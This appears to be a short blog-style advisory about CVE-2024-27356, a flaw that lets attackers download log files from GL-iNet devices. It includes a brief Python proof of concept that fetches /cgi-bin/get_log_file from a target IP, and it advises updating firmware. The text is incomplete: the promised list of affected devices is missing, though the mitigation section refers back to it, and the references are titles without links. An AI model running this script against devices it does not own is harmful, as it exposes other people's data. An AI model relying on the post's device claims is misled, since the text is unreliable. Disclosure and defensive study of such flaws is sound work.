CVE-2024-27356 - Critical File Download Vulnerability Found in GL-iNet Devices: What You Need to Know

A critical security vulnerability, dubbed CVE-2024-27356, has been discovered affecting several GL-iNet devices, putting users' sensitive information at risk. This post aims to provide an in-depth understanding of the vulnerability, the affected devices, and the necessary steps to mitigate its impact.

Vulnerability Details

CVE-2024-27356 has been found on certain GL-iNet devices, where an attacker can maliciously download files, such as logs, via specific commands. Once executed, these commands can potentially result in revealing critical user information to the attacker. It is important to note that this vulnerability affects several GL-iNet devices, including but not limited to:

Exploitation Example

To better understand the issue, let's take a look at an example code snippet demonstrating the vulnerability:

import requests

url = "http://<target_ip>/cgi-bin/get_log_file";
response = requests.get(url)

if response.status_code == 200:
    with open("downloaded_logs.zip", "wb") as downloaded_logs:
        downloaded_logs.write(response.content)

This Python script sends a GET request to the /cgi-bin/get_log_file endpoint of the target GL-iNet device, attempting to download log files. If successful, it will save the downloaded logs to a local file named downloaded_logs.zip.

For more information about this vulnerability, consult the following original references

1. GL-iNet's official website: Devices list
2. CVE-2024-27356: Detailed explanation and mitigation steps
3. GL-iNet devices firmware updates: Download links and instructions

Mitigation

If you own a GL-iNet device mentioned in the list above, we strongly recommend taking immediate action by applying the latest firmware update to your device. Visit GL-iNet's official firmware support page for instructions and download links to the latest firmware versions.

In conclusion, CVE-2024-27356 poses a significant risk to multiple GL-iNet devices, opening up the possibility of attackers obtaining critical user information by unauthorized file downloads. Hence, it is crucial to ensure that you proactively keep your device up-to-date with the latest firmware versions to minimize potential vulnerabilities.

Timeline

Published on: 02/27/2024 01:15:07 UTC
Last modified on: 02/27/2024 14:20:06 UTC